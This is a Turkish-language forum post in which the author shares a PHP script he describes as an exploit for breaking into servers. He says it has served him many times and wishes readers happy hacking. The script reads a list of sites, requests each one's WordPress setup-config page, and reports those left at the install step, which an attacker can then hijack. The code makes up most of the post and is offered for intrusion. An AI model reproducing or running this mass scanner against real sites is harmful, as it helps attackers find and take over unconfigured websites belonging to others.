Uzun zaman önce sunuculara sızmak için kodladığım bir exploittir. Pek çok defa işime yaradı. Sizlerle de paylaşayım dedim. Bol hackler ![Smile :) :)](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7)
Kullanim:
php wpinstall.php sitelistesi.txt
Kullanim:
php wpinstall.php sitelistesi.txt
![x829s2ye.png](/proxy.php?image=http%3A%2F%2Ffs5.directupload.net%2Fimages%2F160221%2Fx829s2ye.png&hash=5e10ae1bb4d1d098362335c062c25159)
![4qw4tcik.png](/proxy.php?image=http%3A%2F%2Ffs5.directupload.net%2Fimages%2F160221%2F4qw4tcik.png&hash=d18eb1a7379b3c094bde0b9805dabd88)
![r9278cuz.png](/proxy.php?image=http%3A%2F%2Ffs5.directupload.net%2Fimages%2F160221%2Fr9278cuz.png&hash=128a4bff8039b28e624d1faa7f0b646b)
PHP:
<?php
echo "\r\n";
echo '## Coded By Nihilist';
echo "\r\n";
echo '## Ajanlar.ORG';
echo "\r\n";
echo "\r\n";
set_time_limit(0);
error_reporting(0);
if (isset($argv[1]))
{
$oku = file_get_contents($argv[1]);
$ayir = split("\r\n",$oku);
foreach($ayir as $siteler)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $siteler."/wp-admin/setup-config.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt");
$icerik = curl_exec($ch);
curl_close($ch);
if (strstr($icerik,'setup-config.php?step=1'))
{
echo $siteler." --> Var :)\r\n";
}
else
{
}
}
}
else{
echo 'Ornek: php wpinstall.php sitelistesi.txt';
}
?>